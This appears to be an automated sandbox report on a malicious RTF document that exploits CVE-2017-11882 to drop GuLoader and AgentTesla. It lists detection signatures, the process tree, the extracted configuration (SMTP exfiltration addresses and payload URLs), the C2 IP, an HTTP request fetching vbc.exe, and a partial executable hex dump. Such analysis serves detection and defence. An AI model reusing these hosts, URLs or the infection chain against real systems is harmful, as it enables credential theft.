Loading ...

Play interactive tourEdit tour

Windows Analysis Report QEw7lxB2iE

Overview

General Information

Sample Name:QEw7lxB2iE (renamed file extension from none to rtf)
Analysis ID:532180
MD5:4e84044d53a87d7e839374d7cade49cc
SHA1:7a1b45ff36797c9607c3dd75d1c73830925dde6a
SHA256:08c01681e8ff89e3bf3f3d3dda76c0a026607f7f4cc3ec8dfbe77ec4c9a45ee3
Tags:rtf
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Yara detected Credential Stealer
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2220 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1416 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2680 cmdline: "C:\Users\Public\vbc.exe" MD5: 99BDB5995C8DD619A3EC2B799D1CF868)
      • Acly3.exe (PID: 2960 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: E32061DA9B34B82E0AB5D0E53CAF5A09)
        • CasPol.exe (PID: 2528 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)
          • misv.exe (PID: 2728 cmdline: "C:\Users\user\AppData\Roaming\misv.exe" MD5: 1DA682EC8DCBC375B6E76660EF46D3FD)
            • misv.exe (PID: 2676 cmdline: C:\Users\user\AppData\Local\Temp\misv.exe MD5: 267CE829152E1E6B2493EE80291C3E6D)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.697985783.000000001E511000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.697985783.000000001E511000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.680879474.0000000000380000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000007.00000000.559197551.00000000000F0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000B.00000002.692913146.0000000002FE0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.122.180, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1416, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1416, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1416, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2680
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1416, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2680

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000007.00000000.559197551.00000000000F0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}
            Source: vbc.exe.2680.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: QEw7lxB2iE.rtfVirustotal: Detection: 49%Perma Link
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: QEw7lxB2iE.rtfAvira: detected
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D64CC614-46F7-4260-89D0-504A02C9841B}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 20%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 20%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\misv.exeJoe Sandbox ML: detected

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Acly3.pdb source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmp
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040290B FindFirstFileW,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_0040290B FindFirstFileW,
            Source: global trafficDNS query: name: onedrive.live.com
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://onedrive.live.com/download?cid=5A15FDA1AE9
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Dec 2021 19:09:11 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Wed, 01 Dec 2021 09:20:35 GMTETag: "2020b-5d2122fb5045c"Accept-Ranges: bytesContent-Length: 131595Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /2200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.122.180Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: CasPol.exe, 00000007.00000002.692944439.00000000006FF000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comw equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: CasPol.exe, 00000007.00000002.692944439.00000000006FF000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: CasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: CasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: Acly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: Acly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: vbc.exe, 00000003.00000002.428943296.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000003.00000000.423214363.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: http://s.symcd.com06
            Source: WINWORD.EXE, 00000000.00000002.580802446.000000000770E000.00000004.00000001.sdmpString found in binary or memory: http://scas.openformatrg/drawml/2006/main
            Source: WINWORD.EXE, 00000000.00000002.580784637.00000000076CE000.00000004.00000010.sdmp, WINWORD.EXE, 00000000.00000002.580827739.000000000776E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.580815883.000000000773E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
            Source: WINWORD.EXE, 00000000.00000002.580784637.00000000076CE000.00000004.00000010.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
            Source: WINWORD.EXE, 00000000.00000002.580827739.000000000776E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.580815883.000000000773E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
            Source: WINWORD.EXE, 00000000.00000002.577537801.0000000004390000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.429138051.0000000001DF0000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.696569499.000000001D770000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: Acly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: Acly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: WINWORD.EXE, 00000000.00000002.577537801.0000000004390000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.429138051.0000000001DF0000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.696569499.000000001D770000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.674762043.0000000001E00000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: CasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: Acly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: CasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
            Source: vbc.exe, 00000003.00000002.428980933.0000000000427000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.428948281.000000000040D000.00000004.00020000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: https://eruitg.bl.files.1drv.com/
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/y4mG7_gxPq0aCWB0OzOGRdy48AIRB0HFvEVqQKtdhzb3ot1RhDNUBZqeAiLjtCr5eOs
            Source: CasPol.exe, 00000007.00000002.692944439.00000000006FF000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: CasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmp, CasPol.exe, 00000007.00000002.692944439.00000000006FF000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6X
            Source: CasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200
            Source: CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AEABBCA8-0F81-4D81-B8F1-603A5AA42D28}.tmpJump to behavior
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: global trafficHTTP traffic detected: GET /2200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.122.180Connection: Keep-Alive
            Source: C:\Users\Public\vbc.exeCode function: 3_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
